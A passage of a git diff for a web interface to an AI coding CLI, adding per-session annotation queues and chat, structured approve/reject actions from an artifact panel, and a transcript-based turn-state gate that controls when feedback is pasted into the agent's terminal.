+    post('artifact-action', payload);
+    return true;
+  }
+
   // ---- highlighting ----------------------------------------------------------
 
   function highlightElement(el) {
@@ -459,6 +519,25 @@
     if (data.type === 'presence') {
       window.dispatchEvent(new CustomEvent('ai-or-die-artifact-presence', { detail: data.payload || {} }));
     }
+    if (data.type === 'plan-state') {
+      // Reflect step/selection state onto the declared controls (contract §8) so
+      // the producer can style them via [data-aod-state]; also dispatch an event.
+      var steps = (data.payload && data.payload.steps) || [];
+      for (var i = 0; i < steps.length; i++) {
+        var s = steps[i];
+        if (!s || !s.elementId) continue;
+        var nodes;
+        try {
+          nodes = document.querySelectorAll('[data-aod-id="' + cssEscape(String(s.elementId)) + '"]');
+        } catch (_) {
+          nodes = [];
+        }
+        for (var j = 0; j < nodes.length; j++) {
+          if (s.state) nodes[j].setAttribute('data-aod-state', String(s.state));
+        }
+      }
+      window.dispatchEvent(new CustomEvent('ai-or-die-artifact-plan-state', { detail: data.payload || {} }));
+    }
   }
 
   window.addEventListener('message', handleHostMessage);
@@ -492,6 +571,7 @@
   }, true);
 
   document.addEventListener('mouseup', function (event) {
+    if (aodActionEl(event.target)) return; // interactive control, not an annotation target
     if (shouldIgnore(event.target)) return;
     var ctx = textSelectionContext(document.getSelection());
     if (!ctx) return;
@@ -500,6 +580,20 @@
   }, true);
 
   document.addEventListener('click', function (event) {
+    // Declarative interactive control: emit a structured action, not an annotation.
+    var aod = aodActionEl(event.target);
+    if (aod) {
+      var action = aod.getAttribute('data-aod-action');
+      var tag = (aod.tagName || '').toLowerCase();
+      if (action === 'check') return; // let the checkbox toggle natively; no emit
+      if (tag === 'select') return;   // <select> emits via 'change' only (no double-emit)
+      // Suppress native navigation/submit for anchors + submit-style controls.
+      if (tag === 'a' || action === 'submit' || (tag === 'button' && aod.type === 'submit')) {
+        event.preventDefault();
+      }
+      emitAodAction(aod);
+      return;
+    }
     if (shouldIgnore(event.target)) return;
     event.preventDefault();
     event.stopPropagation();
@@ -508,6 +602,20 @@
       return;
     }
     showAnnotationCard(event.target);
+  }, true);
+
+  // A data-aod <select> signals via 'change' (its click already returned above, so
+  // there is no double-emit). `check` changes stay UI-local (harvested by submit);
+  // any other data-aod change on a non-select control also emits here as a fallback
+  // for controls that only fire 'change'.
+  document.addEventListener('change', function (event) {
+    var aod = aodActionEl(event.target);
+    if (!aod) return;
+    var action = aod.getAttribute('data-aod-action');
+    if (action === 'check') return; // UI-local
+    var tag = (aod.tagName || '').toLowerCase();
+    if (tag !== 'select') return;   // non-selects already emitted on click
+    emitAodAction(aod);
   }, true);
 
   // ---- legacy API (backward-compat) -----------------------------------------

--- a/src/control/jsonl-awaiting.js
+++ b/src/control/jsonl-awaiting.js
@@ -12,32 +12,93 @@ const DEFAULT_MAX_BYTES = 256 * 1024;
 async function detectAwaiting(file, opts = {}) {
   try {
     const lines = await readTailJsonLines(file, opts.maxBytes || DEFAULT_MAX_BYTES);
-    if (!lines.length) return null;
-
-    let latest = null;
-    for (let lineIndex = 0; lineIndex < lines.length; lineIndex++) {
-      const obj = lines[lineIndex];
-      if (!obj || obj.type !== 'assistant' || obj.isSidechain) continue;
-      const content = obj.message && obj.message.content;
-      if (!Array.isArray(content)) continue;
-      for (const block of content) {
-        if (!block || block.type !== 'tool_use') continue;
-        const mapped = mapUserFacingTool(block.name);
-        if (!mapped) continue;
-        latest = {
-          lineIndex,
-          id: block.id,
-          tool: mapped,
-          input: block.input || {},
-        };
-      }
-    }
-
-    if (!latest || !latest.id) return null;
-    if (hasMatchingToolResult(lines.slice(latest.lineIndex + 1), latest.id)) return null;
-    return awaitingFromTool(latest.tool, latest.input);
+    return awaitingFromLines(lines);
   } catch {
     return null;
+  }
+}
+
+// Pure classifier over already-parsed JSONL lines: the newest user-facing
+// tool_use left without a matching tool_result, or null. Extracted so both
+// detectAwaiting (file path) and detectTurnState can share it without a second
+// file read. detectAwaiting's external contract is unchanged.
+function awaitingFromLines(lines) {
+  if (!Array.isArray(lines) || !lines.length) return null;
+
+  let latest = null;
+  for (let lineIndex = 0; lineIndex < lines.length; lineIndex++) {
+    const obj = lines[lineIndex];
+    if (!obj || obj.type !== 'assistant' || obj.isSidechain) continue;
+    const content = obj.message && obj.message.content;
+    if (!Array.isArray(content)) continue;
+    for (const block of content) {
+      if (!block || block.type !== 'tool_use') continue;
+      const mapped = mapUserFacingTool(block.name);
+      if (!mapped) continue;
+      latest = {
+        lineIndex,
+        id: block.id,
+        tool: mapped,
+        input: block.input || {},
+      };
+    }
+  }
+
+  if (!latest || !latest.id) return null;
+  if (hasMatchingToolResult(lines.slice(latest.lineIndex + 1), latest.id)) return null;
+  return awaitingFromTool(latest.tool, latest.input);
+}
+
+// Turn-state classifier for the artifact-push idle gate (ADR-0035 hardening).
+// PRIMARY gate signal: the transcript reflects semantic turn state, unlike the
+// PTY-quiet heuristic (a quiet PTY is exactly the pending-menu case). Returns:
+//   - 'awaiting_input'  : a user-facing tool (ExitPlanMode/AskUserQuestion/
+//                         permission) is pending — NEVER inject free text here,
+//                         it would answer the live menu.
+//   - 'idle_at_prompt'  : the last assistant turn is complete with no unresolved
+//                         tool_use and no trailing tool_result — safe to push.
+//   - 'working'         : a non-user-facing tool_use is pending, or a tool_result
+//                         is queued for the agent to continue — do not push.
+//   - 'unknown'         : no readable binding — caller falls back to the PTY-quiet
+//                         secondary guard.
+// Never throws; an unreadable/absent file is 'unknown'. Shape is additive: the
+// control-plane turn_ended/waiting_input event contracts are untouched.
+async function detectTurnState(file, opts = {}) {
+  try {
+    const lines = await readTailJsonLines(file, opts.maxBytes || DEFAULT_MAX_BYTES);
+    if (!lines.length) return { state: 'unknown' };
+
+    const awaiting = awaitingFromLines(lines);
+    if (awaiting) {
+      return { state: 'awaiting_input', pendingUserFacingTool: awaiting.pendingUserFacingTool };
+    }
+
+    let lastAssistantIdx = -1;
+    for (let i = lines.length - 1; i >= 0; i--) {
+      const o = lines[i];
+      if (o && o.type === 'assistant' && !o.isSidechain) { lastAssistantIdx = i; break; }
+    }
+    if (lastAssistantIdx === -1) return { state: 'unknown' };
+
+    const after = lines.slice(lastAssistantIdx + 1);
+    // A trailing tool_result means the agent has tool output to keep processing.
+    const hasTrailingToolResult = after.some((o) => {
+      if (!o || o.type !== 'user' || o.isSidechain) return false;
+      const content = o.message && o.message.content;
+      return Array.isArray(content) && content.some((b) => b && b.type === 'tool_result');
+    });
+    if (hasTrailingToolResult) return { state: 'working' };
+
+    // Any unresolved tool_use in the last assistant message → mid-tool (working).
+    const content = lines[lastAssistantIdx].message && lines[lastAssistantIdx].message.content;
+    const toolUses = Array.isArray(content) ? content.filter((b) => b && b.type === 'tool_use') : [];
+    const unresolved = toolUses.some((tu) => tu.id && !hasMatchingToolResult(after, tu.id));
+    if (unresolved) return { state: 'working' };
+
+    // Last assistant turn is complete with nothing pending → idle at the prompt.
+    return { state: 'idle_at_prompt' };
+  } catch {
+    return { state: 'unknown' };
   }
 }
 
@@ -170,4 +231,4 @@ function shortString(value, maxLen) {
   return s.length > maxLen ? s.slice(0, maxLen) : s;
 }
 
-module.exports = { detectAwaiting };
+module.exports = { detectAwaiting, detectTurnState };

--- a/src/public/app.js
+++ b/src/public/app.js
@@ -2858,9 +2858,13 @@ class ClaudeCodeWebInterface {
                 if (this._artifactPanel) this._artifactPanel.reloadReview(message);
                 break;
 
-            case 'artifact_agent_reply':
-                if (this._artifactPanel) this._artifactPanel.agentReply(message);
+            case 'artifact_review_dismissed':
+                if (this._artifactPanel) this._artifactPanel.dismissedByServer(message);
                 break;
+
+            // NOTE: artifact_agent_reply WS render was removed (C-P0-1). Agent
+            // replies render via the SSE /events stream only, so they can never
+            // double-render. The server no longer broadcasts that message.
 
             case 'sticky_notes_model_progress': {
                 const banner = document.getElementById('stickyNotesDownloadBanner');

--- a/src/public/artifact-panel.js
+++ b/src/public/artifact-panel.js
@@ -53,7 +53,8 @@
       this._collapsed = false;   // session-show gate (switched-away / closed)
       this._minimized = false;   // window minimized to header bar
       this._maximized = false;   // window expanded to fill the wrapper
-      this._queue = [];          // queued annotations (the pills); panel-owned
+      // Annotation queue + chat are per-session (see reviews Map / C-P0-2), not
+      // a single shared array — switching tabs must not drop another tab's state.
       this._presence = 'waiting';
       this.onStateChange = null;
 
@@ -146,6 +147,22 @@
 
       const wrapper = document.querySelector('.terminal-wrapper') || document.getElementById('terminalContainer') || document.body;
       if (wrapper) wrapper.appendChild(this.el);
+
+      // Re-open badge (C-P0-3): a small affordance shown when the panel is
+      // dismissed, so × is no longer a dead-end. Click restores the panel.
+      this._reopenBadge = el('button', {
+        class: 'artifact-panel__reopen', type: 'button', hidden: 'hidden',
+        title: 'Reopen artifact review', 'aria-label': 'Reopen artifact review',
+        text: '⤢ Artifact review',
+      });
+      this._reopenBadge.addEventListener('click', () => this.expand());
+      if (wrapper) wrapper.appendChild(this._reopenBadge);
+    }
+
+    // Active review record (or null). All per-session state (queue, chat) hangs
+    // off this, so tab switches never touch another session's state.
+    _activeReview() {
+      return this.activeSessionId ? (this.reviews.get(this.activeSessionId) || null) : null;
     }
 
     // ---- floating-window geometry ----------------------------------------
@@ -352,12 +369,20 @@
     open(message) {
       if (!message || !message.sessionId) return;
       const sessionId = String(message.sessionId);
+      const existing = this.reviews.get(sessionId);
       this.reviews.set(sessionId, {
         sessionId,
         viewUrl: this._authUrl('/view', sessionId), // client-token URL, not the broadcast's
         file: message.file || null,
         ready: false,
         scroll: { x: 0, y: 0 },
+        // Per-session panel state (C-P0-2): the queue (pills) and chat log live
+        // with the review, so switching tabs never drops queued annotations or
+        // wipes chat. Preserved across re-open of the same session.
+        queue: (existing && Array.isArray(existing.queue)) ? existing.queue : [],
+        chat: (existing && Array.isArray(existing.chat)) ? existing.chat : [],
+        chatCursor: (existing && typeof existing.chatCursor === 'number') ? existing.chatCursor : 0,
+        dismissed: false,
       });
       if (sessionId === this.activeSessionId) this._show(sessionId);
       this._emitState();
@@ -368,28 +393,33 @@
       if (!sessionId) return;
       this.reviews.delete(sessionId);
       if (sessionId === this._sseSessionId) this._teardownSse();
-      if (sessionId === this.activeSessionId) { this._clearQueue(); this._hide(); }
+      if (sessionId === this.activeSessionId) { this._renderQueue(); this._hide(); this._updateReopenBadge(); }
       this._emitState();
     }
 
-    agentReply(message) {
-      if (!message) return;
-      const sessionId = String(message.sessionId || this.activeSessionId || '');
-      const text = message.text == null ? '' : String(message.text);
-      if (sessionId === this.activeSessionId) {
-        this._appendChat('agent', text);
-        this._postToIframe('agent-reply', { text });
-        // The agent responded, so it is no longer mid-turn: re-enable Send.
-        if (this._presence === 'working') this._setPresence('listening');
-      }
+    // Server-driven dismiss/show (C-P0-3): another device (or the artifact_dismiss
+    // tool) changed panel visibility. Mirror it so all viewers agree.
+    dismissedByServer(message) {
+      const sessionId = message && message.sessionId ? String(message.sessionId) : this.activeSessionId;
+      if (!sessionId) return;
+      const review = this.reviews.get(sessionId);
+      if (review) review.dismissed = !!(message && message.dismissed);
+      if (sessionId !== this.activeSessionId) return;
+      if (review && review.dismissed) { this._collapsed = true; this._hide(); }
+      else { this._collapsed = false; if (this.reviews.has(sessionId)) this._show(sessionId); }
+      this._updateReopenBadge();
+      this._emitState();
     }
 
     notifyActiveSessionChanged(sessionId) {
       this.activeSessionId = sessionId ? String(sessionId) : null;
       this._cancelPendingSnapshot();
-      this._clearQueue();
-      if (this.activeSessionId && this.reviews.has(this.activeSessionId)) this._show(this.activeSessionId);
+      const review = this._activeReview();
+      // Per-session state (C-P0-2): do NOT clear the queue or wipe chat on switch.
+      // A dismissed review stays hidden (badge shown); otherwise show + repaint.
+      if (this.activeSessionId && review && !review.dismissed) this._show(this.activeSessionId);
       else this._hide();
+      this._updateReopenBadge();
     }
 
     _cancelPendingSnapshot() {
@@ -403,14 +433,21 @@
       const review = this.reviews.get(sessionId);
       if (!review) return;
       if (this._iframe.getAttribute('data-session') !== sessionId) {
-        this._chatLog.innerHTML = '';
-        this._clearQueue();
         this._iframe.setAttribute('data-session', sessionId);
         this._iframe.src = review.viewUrl;
       }
+      // Repaint per-session chat + queue (never wipe to empty on switch/re-open).
+      this._repaintChat(review);
+      this._renderQueue();
       this._connectSse(sessionId);
+      // Rehydrate from the server ONLY on a first, empty render of this session in
+      // this client (fresh load / reload). During live use chat is client-owned,
+      // so we never re-fetch and can't double-render.
+      if (!review.chat || review.chat.length === 0) this._loadHistory(sessionId);
       this._collapsed = false;
+      review.dismissed = false;
       this.el.hidden = false;
+      this._updateReopenBadge();
       // Now that the panel is visible (and measurable), pull any off-screen
       // persisted position back into the wrapper so the header stays grabbable.
       this._clampToBounds();
@@ -419,11 +456,34 @@
       this.el.hidden = true;
       this._teardownSse();
     }
-    collapse() { this._collapsed = true; this._hide(); this._emitState(); }
+    // × dismiss: server-authoritative hide, review stays alive, re-open badge shown.
+    collapse() {
+      this._collapsed = true;
+      const sessionId = this.activeSessionId;
+      const review = this._activeReview();
+      if (review) review.dismissed = true;
+      if (sessionId) this._post('/dismiss', sessionId, { dismissed: true });
+      this._hide();
+      this._updateReopenBadge();
+      this._emitState();
+    }
     expand() {
       this._collapsed = false;
-      if (this.activeSessionId && this.reviews.has(this.activeSessionId)) this._show(this.activeSessionId);
+      const sessionId = this.activeSessionId;
+      const review = this._activeReview();
+      if (review) review.dismissed = false;
+      if (sessionId && this.reviews.has(sessionId)) {
+        this._post('/dismiss', sessionId, { dismissed: false });
+        this._show(sessionId);
+      }
+      this._updateReopenBadge();
       this._emitState();
+    }
+    _updateReopenBadge() {
+      if (!this._reopenBadge) return;
+      const review = this._activeReview();
+      const show = !!(review && review.dismissed);
+      this._reopenBadge.hidden = !show;
     }
     isOpenForActive() { return !!(this.activeSessionId && this.reviews.has(this.activeSessionId)); }
 
@@ -494,6 +554,10 @@
         if (review) review.scroll = { x: Number(payload.x) || 0, y: Number(payload.y) || 0 };
         return;
       }
+      if (data.type === 'artifact-action') {
+        this._handleAction(sessionId, payload);
+        return;
+      }
       // Legacy message types (backward-compat with the pre-annotation SDK and
       // existing artifacts). 'artifact-prompts' POSTs immediately (the old
       // contract had no queue); 'artifact-layout-warnings' forwards to the
@@ -532,39 +596,46 @@
       );
     }
 
-    // ---- annotation queue + pills ----------------------------------------
+    // ---- annotation queue + pills (per-session; C-P0-2) ------------------
     _enqueueAnnotation(annotation) {
       if (!annotation || typeof annotation !== 'object') return;
-      this._queue.push(annotation);
+      const review = this._activeReview();
+      if (!review) return;
+      if (!Array.isArray(review.queue)) review.queue = [];
+      review.queue.push(annotation);
       this._renderQueue();
     }
     _clearQueue() {
-      this._queue = [];
+      const review = this._activeReview();
+      if (review) review.queue = [];
       this._renderQueue();
     }
     _renderQueue() {
       if (!this._pills) return;
+      const review = this._activeReview();
+      const queue = (review && Array.isArray(review.queue)) ? review.queue : [];
       this._pills.innerHTML = '';
-      this._queue.forEach((annotation, index) => {
+      queue.forEach((annotation, index) => {
         const label = (annotation.prompt || annotation.text || annotation.selector || 'annotation').toString();
         const pill = el('div', { class: 'artifact-panel__pill' });
         const preview = el('span', { class: 'artifact-panel__pill-text', title: annotation.selector || '', text: label });
         const remove = el('button', { class: 'artifact-panel__pill-x', type: 'button', 'aria-label': 'Remove queued annotation', text: '×' });
-        remove.addEventListener('click', () => { this._queue.splice(index, 1); this._renderQueue(); });
+        remove.addEventListener('click', () => { queue.splice(index, 1); this._renderQueue(); });
         pill.appendChild(preview);
         pill.appendChild(remove);
         this._pills.appendChild(pill);
       });
-      this._pillBar.hidden = this._queue.length === 0;
-      if (this._sendBtn) this._sendBtn.disabled = this._queue.length === 0 || this._presence === 'working';
+      this._pillBar.hidden = queue.length === 0;
+      if (this._sendBtn) this._sendBtn.disabled = queue.length === 0 || this._presence === 'working';
     }
     // Panel "Send to agent": ask the iframe SDK for a live DOM snapshot, then
     // flush the queue with it — so panel-Send carries the same context the SDK's
     // own Cmd/Ctrl+Enter send does. Falls back to sending without a snapshot if
     // the iframe doesn't reply promptly (sandboxed / not ready).
     _sendQueueWithSnapshot() {
+      const review = this._activeReview();
       const sessionId = this.activeSessionId;
-      if (!sessionId || this._queue.length === 0) return;
+      if (!sessionId || !review || !Array.isArray(review.queue) || review.queue.length === 0) return;
       if (this._snapshotPending) return; // a request is already in flight
       this._snapshotPending = true;
       this._snapshotSession = sessionId;
@@ -581,12 +652,14 @@
     }
     _sendQueue(domSnapshot) {
       const sessionId = this.activeSessionId;
-      if (!sessionId || !this.reviews.has(sessionId) || this._queue.length === 0) return;
-      const prompts = this._queue.slice();
+      const review = this._activeReview();
+      if (!sessionId || !review || !Array.isArray(review.queue) || review.queue.length === 0) return;
+      const prompts = review.queue.slice();
       // Optimistically clear so the pills reflect "sending"; restore them to the
       // FRONT of the queue if the POST fails (network error or non-2xx) so the
       // user's annotations are never silently lost and can be retried.
-      this._clearQueue();
+      review.queue = [];
+      this._renderQueue();
       prompts.forEach((p) => this._appendChat('you', (p && (p.prompt || p.text)) ? String(p.prompt || p.text) : JSON.stringify(p)));
       if (this._presence === 'listening') this._setPresence('working');
       let settle;
@@ -606,26 +679,149 @@
         // but the POST may complete with no reply, or fail).
         if (this._presence === 'working') this._setPresence('listening');
         if (ok) return;
-        this._queue = prompts.concat(this._queue);
+        const cur = this._activeReview();
+        if (cur) { cur.queue = prompts.concat(Array.isArray(cur.queue) ? cur.queue : []); }
         this._renderQueue();
         this._appendChat('agent', 'Could not send your annotations. They were restored to the queue — press Send to retry.');
       });
     }
 
+    // Note composer: restore the note + surface a retry on POST failure (C-P0-7),
+    // mirroring _sendQueue — a dropped note is never silently lost.
     _submitNote() {
+      const sessionId = this.activeSessionId;
       const text = (this._chatInput.value || '').trim();
-      if (!text || !this.activeSessionId) return;
+      if (!text || !sessionId) return;
       this._chatInput.value = '';
-      this._post('/prompts', this.activeSessionId, { prompts: [text] });
       this._appendChat('you', text);
+      let settle;
+      try {
+        settle = this._post('/prompts', sessionId, { prompts: [text] });
+      } catch (err) {
+        settle = Promise.resolve(false);
+      }
+      settle.then((ok) => {
+        if (ok) return;
+        // Restore the note into the composer so the user can retry.
+        if (sessionId === this.activeSessionId && !(this._chatInput.value || '').trim()) {
+          this._chatInput.value = text;
+        }
+        this._appendChat('agent', 'Could not send your note — it was restored to the box. Press Send to retry.');
+      });
     }
 
+    // ---- chat (per-session; single render path via SSE) -------------------
+    // Record + render a locally-originated chat line (optimistic 'you' sends and
+    // local status notices). Agent replies arrive via _applyAgentReply (id-deduped).
     _appendChat(role, text) {
+      const review = this._activeReview();
+      const entry = { role, text: String(text) };
+      if (review) { if (!Array.isArray(review.chat)) review.chat = []; review.chat.push(entry); }
+      this._renderChatEntry(entry);
+    }
+    _renderChatEntry(entry) {
+      const role = entry.role === 'agent' ? 'agent' : 'you';
       const line = el('div', { class: 'artifact-panel__msg artifact-panel__msg--' + role });
-      line.appendChild(el('span', { class: 'artifact-panel__role', text: role === 'agent' ? 'agent' : 'you' }));
-      line.appendChild(el('span', { class: 'artifact-panel__text', text: String(text) }));
+      line.appendChild(el('span', { class: 'artifact-panel__role', text: role }));
+      line.appendChild(el('span', { class: 'artifact-panel__text', text: String(entry.text) }));
       this._chatLog.appendChild(line);
       this._chatLog.scrollTop = this._chatLog.scrollHeight;
+    }
+    _repaintChat(review) {
+      this._chatLog.innerHTML = '';
+      const chat = (review && Array.isArray(review.chat)) ? review.chat : [];
+      chat.forEach((entry) => this._renderChatEntry(entry));
+    }
+    // Apply an agent reply from SSE, de-duplicated by server event id so the
+    // native EventSource reconnect replay (Last-Event-ID) can't render it twice.
+    _applyAgentReply(sessionId, id, text) {
+      const review = this.reviews.get(sessionId);
+      if (!review) return;
+      const numId = Number(id);
+      if (Number.isFinite(numId) && numId > 0) {
+        if (numId <= (review.chatCursor || 0)) return; // already seen
+        review.chatCursor = numId;
+      }
+      if (!Array.isArray(review.chat)) review.chat = [];
+      const entry = { role: 'agent', text: String(text == null ? '' : text), id: id };
+      review.chat.push(entry);
+      if (sessionId === this.activeSessionId) {
+        this._renderChatEntry(entry);
+        this._postToIframe('agent-reply', { text: entry.text });
+        if (this._presence === 'working') this._setPresence('listening');
+      }
+    }
+    // Rehydrate chat from the server on a first/empty render (fresh load / reload).
+    // De-dupes agent replies by id against chatCursor so a later SSE frame for the
+    // same reply is ignored.
+    _loadHistory(sessionId) {
+      const url = this._authUrl('/history', sessionId);
+      fetch(url, { headers: this._authHeaders() }).then(
+        (res) => (res && res.ok ? res.json() : null),
+        () => null
+      ).then((data) => {
+        if (!data || sessionId !== this.activeSessionId) return;
+        const review = this.reviews.get(sessionId);
+        if (!review) return;
+        const hist = Array.isArray(data.chat) ? data.chat.map((c) => ({
+          role: c.role === 'agent' ? 'agent' : 'you',
+          text: String(c.text == null ? '' : c.text),
+          id: c.id,
+        })) : [];
+        // MERGE with any live entries that landed during the fetch, de-duped by id,
+        // so a reply arriving mid-fetch can't discard the prior history (or be
+        // dropped). History is the authoritative prefix; live-only entries follow.
+        const histIds = new Set(hist.filter((c) => c.id != null).map((c) => String(c.id)));
+        const live = (Array.isArray(review.chat) ? review.chat : [])
+          .filter((c) => c.id == null || !histIds.has(String(c.id)));
+        review.chat = hist.concat(live);
+        // Advance the cursor past the highest agent-reply id we now hold so SSE
+        // won't re-add any of them.
+        review.chatCursor = review.chat.reduce((m, c) => {
+          const n = Number(c.id);
+          return (c.role === 'agent' && Number.isFinite(n)) ? Math.max(m, n) : m;
+        }, review.chatCursor || 0);
+        this._repaintChat(review);
+      });
+    }
+
+    // ---- structured actions (data-aod-*; C-P1-3) --------------------------
+    // Handle an 'artifact-action' from the iframe SDK: optimistically reflect the
+    // step/selection state back into the artifact, echo to chat, and POST the
+    // structured action to /actions (the server routes approvals or drains it).
+    _handleAction(sessionId, payload) {
+      if (!payload || sessionId !== this.activeSessionId) return;
+      const review = this._activeReview();
+      if (!review) return;
+      const action = { action: String(payload.action || ''), elementId: String(payload.elementId || '') };
+      if (!action.action || !action.elementId) return;
+      if (typeof payload.value === 'string') action.value = payload.value;
+      if (typeof payload.group === 'string') action.group = payload.group;
+      if (Array.isArray(payload.selected)) action.selected = payload.selected;
+      const ctx = payload.context || {};
+      if (typeof ctx.selector === 'string') action.selector = ctx.selector;
+      if (typeof ctx.sourceLine === 'number') action.sourceLine = ctx.sourceLine;
+
+      // Optimistic plan-state reflect back into the iframe.
+      if (!review.planState) review.planState = {};
+      const stateMap = { approve: 'approved', reject: 'rejected', choose: 'approved', submit: 'done' };
+      const steps = [];
+      const setState = (id, st) => { review.planState[id] = st; steps.push({ elementId: id, state: st }); };
+      if (action.action === 'submit' && Array.isArray(action.selected)) {
+        action.selected.forEach((s) => { if (s && s.elementId) setState(String(s.elementId), 'done'); });
+        setState(action.elementId, 'done');
+      } else {
+        setState(action.elementId, stateMap[action.action] || 'done');
+      }
+      this._postToIframe('plan-state', { steps });
+
+      // Echo to chat for visibility.
+      const label = action.action === 'submit'
+        ? 'submitted ' + (action.group || '') + ' (' + (Array.isArray(action.selected) ? action.selected.length : 0) + ' selected)'
+        : action.action + ': ' + action.elementId + (action.value ? ' = ' + action.value : '');
+      this._appendChat('you', '[' + label + ']');
+
+      this._post('/actions', sessionId, { actions: [action], domSnapshot: payload.domSnapshot });
     }
 
     // ---- presence ---------------------------------------------------------
@@ -638,7 +834,9 @@
         this._refs.presence.textContent = label;
         this._refs.presence.setAttribute('data-state', this._presence);
       }
-      if (this._sendBtn) this._sendBtn.disabled = this._queue.length === 0 || this._presence === 'working';
+      const review = this._activeReview();
+      const queueLen = (review && Array.isArray(review.queue)) ? review.queue.length : 0;
+      if (this._sendBtn) this._sendBtn.disabled = queueLen === 0 || this._presence === 'working';
     }
 
     // ---- SSE (agent replies + presence + end) ----------------------------
@@ -655,9 +853,9 @@
       src.addEventListener('agent-reply', (e) => {
         const d = this._parse(e.data);
         if (d && typeof d.text === 'string') {
-          this._appendChat('agent', d.text);
-          this._postToIframe('agent-reply', { text: d.text });
-          if (this._presence === 'working') this._setPresence('listening');
+          // SSE is the SOLE render path (C-P0-1); id-deduped so the native
+          // EventSource reconnect replay can't double-render (C-P0-4).
+          this._applyAgentReply(sessionId, d.id, d.text);
         }
       });
       src.addEventListener('presence', (e) => {

--- a/src/public/components/artifact-panel.css
+++ b/src/public/components/artifact-panel.css
@@ -25,6 +25,30 @@
 }
 .artifact-panel[hidden] { display: none; }
 
+/* Re-open badge (C-P0-3): shown when the panel is dismissed so × is not a
+   dead-end. Anchored bottom-right where the panel sits. */
+.artifact-panel__reopen {
+  position: absolute;
+  right: 16px;
+  bottom: 16px;
+  z-index: 41;
+  display: inline-flex;
+  align-items: center;
+  gap: 6px;
+  padding: 8px 12px;
+  border: 1px solid var(--panel-border, #33363f);
+  border-radius: 999px;
+  background: var(--panel-header-bg, #232630);
+  color: var(--panel-fg, #e6e6e6);
+  font-size: 12px;
+  font-weight: 600;
+  cursor: pointer;
+  box-shadow: 0 6px 20px rgba(0, 0, 0, 0.35);
+}
+.artifact-panel__reopen:hover { filter: brightness(1.12); }
+.artifact-panel__reopen:focus-visible { outline: 2px solid var(--accent-default, #2563eb); outline-offset: 1px; }
+.artifact-panel__reopen[hidden] { display: none; }
+
 /* Minimized: collapse to just the header bar. */
 .artifact-panel--minimized {
   height: auto !important;

--- a/src/server.js
+++ b/src/server.js
@@ -39,7 +39,7 @@ const TranscriptBuffer = require('./sticky-note-transcript');
 const { createControlRouter } = require('./control/routes');
 const { ArtifactReviewStore, createArtifactReviewRouter, createAssetTokenSigner, buildArtifactPushPayload, artifactPushEnabledFromEnv } = require('./artifact-review');
 const { deriveStatus, awaitingKindForPendingTool, awaitingFromScreen, TRUST_PROMPT_REGEX, DEFAULT_UNBOUND_QUIET_MS } = require('./control/session-status');
-const { detectAwaiting } = require('./control/jsonl-awaiting');
+const { detectAwaiting, detectTurnState } = require('./control/jsonl-awaiting');
 
 // HOT-08: per-WebSocket-message size cap. Gates JSON.parse so a single
 // large frame can't block the event loop for tens-to-hundreds of ms.
@@ -1281,6 +1281,7 @@ class ClaudeCodeWebServer {
       pushToAgent: this._artifactPushEnabled
         ? (sessionId, text) => this._pushArtifactFeedbackToAgent(sessionId, text)
         : null,
+      routeApprovalAction: (sessionId, action) => this._routeArtifactApproval(sessionId, action),
     }));
 
     // Commands API removed
@@ -4132,18 +4133,42 @@ class ClaudeCodeWebServer {
   // Artifact-push hook (wired only when AIORDIE_ARTIFACT_PUSH is enabled). Inject
   // panel feedback into the idle CLI as a NEW turn. Returns true only if it
   // actually wrote to the PTY (the caller then consumes the queued prompts).
-  // Idle gate: decline when the session's PTY emitted output within the quiet
-  // window (likely mid-render / mid-turn), a heuristic, hence opt-in. Bracketed
-  // paste keeps multi-line feedback atomic; a trailing CR submits the turn.
+  //
+  // Idle gate (ADR-0035 hardening / C-P0-6): the transcript turn-state is the
+  // PRIMARY gate — a quiet PTY is exactly the pending-menu case, so PTY-quiet
+  // alone is unsafe. When a JSONL binding EXISTS, the transcript is authoritative:
+  // inject ONLY on idle_at_prompt; decline on awaiting_input / working AND on
+  // unknown (a transient read failure on a bound session must NOT fall back to the
+  // unsafe PTY-quiet heuristic — that is exactly the menu-injection race this gate
+  // closes). Only when there is NO binding (raw claude.exe whose slug doesn't
+  // resolve) do we degrade to the original PTY-quiet-only behavior. Read fresh
+  // per push (human-paced, so the cost is negligible) to avoid stale-state
+  // injection.
   async _pushArtifactFeedbackToAgent(sessionId, text) {
     if (!text || typeof text !== 'string') return false;
     const bridge = this._bridgeForSession(sessionId);
     if (!bridge) return false;
+
+    const binding = this._stickyJsonl && this._stickyJsonl.get(sessionId);
+    if (binding && binding.file) {
+      const turn = await this._artifactTurnState(binding);
+      // Bound session: transcript is the sole authority. Anything but a proven
+      // idle-at-prompt declines (awaiting_input / working / unknown).
+      return (turn && turn.state === 'idle_at_prompt')
+        ? this._writeArtifactPush(bridge, sessionId, text)
+        : false;
+    }
+
+    // No JSONL binding: degrade to the original PTY-quiet-only heuristic — decline
+    // while the PTY emitted output within the quiet window (likely mid-render).
     const quietMs = bridge.msSinceLastOutput(sessionId);
     if (quietMs === null || quietMs < this._artifactPushQuietMs) return false;
-    // Sanitize + bracketed-paste-wrap the human text (pure helper, unit-tested in
-    // artifact-review): strips ESC/control bytes so nothing can break out of the
-    // paste envelope, and a trailing CR submits the turn.
+    return this._writeArtifactPush(bridge, sessionId, text);
+  }
+
+  // Sanitize + bracketed-paste-wrap the human text and write it to the PTY. Pure
+  // helper split out so both idle-gate branches share it. Returns true on write.
+  async _writeArtifactPush(bridge, sessionId, text) {
     const payload = buildArtifactPushPayload(text);
     if (!payload) return false;
     try {
@@ -4151,6 +4176,40 @@ class ClaudeCodeWebServer {
       return true;
     } catch (_) {
       return false;
+    }
+  }
+
+  // Structured-approval routing (contract §5 / C-P1-4): when a panel action is an
+  // approve/reject/choose that answers a pending user-facing menu (ExitPlanMode /
+  // AskUserQuestion / permission), deliver it through the control-plane respond
+  // path instead of the drain. _controlRespond itself checks detectAwaiting and
+  // returns PRECONDITION_FAILED when nothing is pending, so we route only when a
+  // menu is genuinely up; otherwise the action falls back to the /await drain.
+  async _routeArtifactApproval(sessionId, action) {
+    if (!this.claudeSessions || !this.claudeSessions.has(sessionId)) return false;
+    const verb = action && action.action;
+    const opts = { sessionId };
+    if (verb === 'approve') opts.choice = 'accept';
+    else if (verb === 'reject') opts.choice = 'reject';
+    else if (verb === 'choose') { if (action.value == null) return false; opts.optionValue = action.value; }
+    else return false;
+    try {
+      const result = await this._controlRespond(opts);
+      return !!(result && result.delivered && !result.error);
+    } catch (_) {
+      return false;
+    }
+  }
+
+  // Fresh transcript turn-state for the artifact push gate. Never cached: a safety
